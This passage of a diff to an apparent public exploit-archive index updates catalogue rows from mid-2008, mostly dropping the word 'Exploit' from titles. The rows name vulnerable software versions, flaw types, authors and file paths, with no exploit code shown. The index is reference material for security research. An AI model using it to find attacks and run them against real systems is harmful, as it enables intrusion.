1b - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 +5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 +5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 @@ -5566,7 +5567,7 @@ id,file,description,date,author,platform,type,port 5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 -5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 +5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload",2008-06-26,EgiX,php,webapps,0 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 - (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 @@ -5591,9 +5592,9 @@ id,file,description,date,author,platform,type,port 5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 -5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 +5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps,0 -5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 +5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 @@ -5615,7 +5616,7 @@ id,file,description,date,author,platform,type,port 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps,0 5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps,0 -5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions Exploit",2008-07-02,Ciph3r,php,webapps,0 +5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps,0 5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection",2008-07-03,storm,php,webapps,0 5999,platforms/php/webapps/5999.txt,"phpWebNews 0.2 MySQL Edition - (det) SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 @@ -5623,16 +5624,16 @@ id,file,description,date,author,platform,type,port 6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion",2008-07-04,DSecRG,php,webapps,0 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0 -6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow Exploit",2008-07-04,"Karol Wiesek",windows,remote,0 -6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 +6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 +6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps,0 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 -6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 -6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 +6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps,0 +6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 -6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 -6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote SEH Overwrite",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,platforms/osx/remote/6013.pl,"Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow Exploit",2008-07-06,krafty,osx,remote,0 +6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 +6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 +6013,platforms/osx/remote/6013.pl,"Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 @@ -5641,14 +5642,14 @@ id,file,description,date,author,platform,type,port 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 -6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 +6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",multiple,dos,0 -6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow Exploit",2008-07-08,h07,windows,local,0 +6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 @@ -5660,7 +5661,7 @@ id,file,description,date,author,platform,type,port 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 -6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 (OS X) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",osx,dos,0 +6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service (PoC)",2008-07-12,"Mu Security",multiple,dos,0 @@ -5684,7 +5685,7 @@ id,file,description,date,author,platform,type,port 6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection",2008-07-13,DNX,php,webapps,0 -6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 +6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 @@ -5731,7 +5732,7 @@ id,file,description,date,author,platform,type,port 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 -6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (Perl)",2008-07-22,"Guido Landi",windows,remote,0 +6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (Perl)",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'default.asp catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 @@ -5742,7 +5743,7 @@ id,file,description,date,author,platform,type,port 6124,platforms/windows/remote/6124.c,"Microsoft Access - (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 -6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 +6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 @@ -5767,7 +5768,7 @@ id,file,description,date,author,platform,type,port 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 -6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit",2008-07-28,Elazar,windows,remote,0 +6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 @@ -5781,9 +5782,9 @@ id,file,description,date,author,platform,type,port 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 -6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 +6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 -6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 +6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) SQL Injection",2008-07-30,Jack,php,webapps,0 @@ -5806,7 +5807,7 @@ id,file,description,date,author,platform,type,port 6188,platforms/windows/local/6188.c,"Irfanview 3.99 - IFF File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0 -6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 +6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 @@ -5831,7 +5832,7 @@ id,file,description,date,author,platform,type,port 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0 6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0 -6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager - 'atucfobj.dll' ActiveX Remote Buffer Overflow Exploit",2008-08-10,"Guido Landi",windows,remote,0 +6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0 6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] SQL Injection",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 @@ -5847,7 +5848,7 @@ id,file,description,date,author,platform,type,port 6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 -6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - NULL pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos,0 +6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote,0 6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)",2008-08-13,h07,windows,dos,0 @@ -5861,7 +5862,7 @@ id,file,description,date,author,platform,type,port 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0 -6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow Exploit (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 +6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client - Remote Format String (PoC)",2008-08-17,securfrog,windows,dos,0 6258,platforms/php/webapps/6258.txt,"PHPBasket - 'product.php pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 @@ -5895,8 +5896,8 @@ id,file,description,date,author,platform,type,port 6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 -6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Authentication Bypass Exploit",2008-08-25,noensr,hardware,remote,0 -6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 +6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0 +6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps,0 @@ -5906,22 +5907,22 @@ id,file,description,date,author,platform,type,port 6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure",2008-08-26,SirGod,php,webapps,0 6315,platforms/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection (2)",2008-08-26,c411k,php,webapps,0 -6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow Exploit",2008-08-26,Koshi,windows,remote,0 +6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow",2008-08-26,Koshi,windows,remote,0 6318,platforms/windows/remote/6318.html,"Ultra Office - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"Yourownbux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow Exploit",2008-08-28,Koshi,windows,local,0 -6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow Exploit",2008-08-28,spdr,windows,remote,0 -6324,platforms/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution Exploit",2008-08-28,spdr,windows,remote,0 +6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0 +6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,windows,remote,0 +6324,platforms/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution",2008-08-28,spdr,windows,remote,0 6325,platforms/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 -6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption Denial of Service",2008-08-29,"YAG KOHHA",windows,dos,0 +6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial Of Service)",2008-08-29,"YAG KOHHA",windows,dos,0 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow (PoC)",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 -6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow Exploit",2008-08-29,Koshi,windows,local,0 +6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 -6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow Exploit",2008-08-30,Koshi,windows,local,0 +6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 @@ -5931,7 +5932,7 @@ 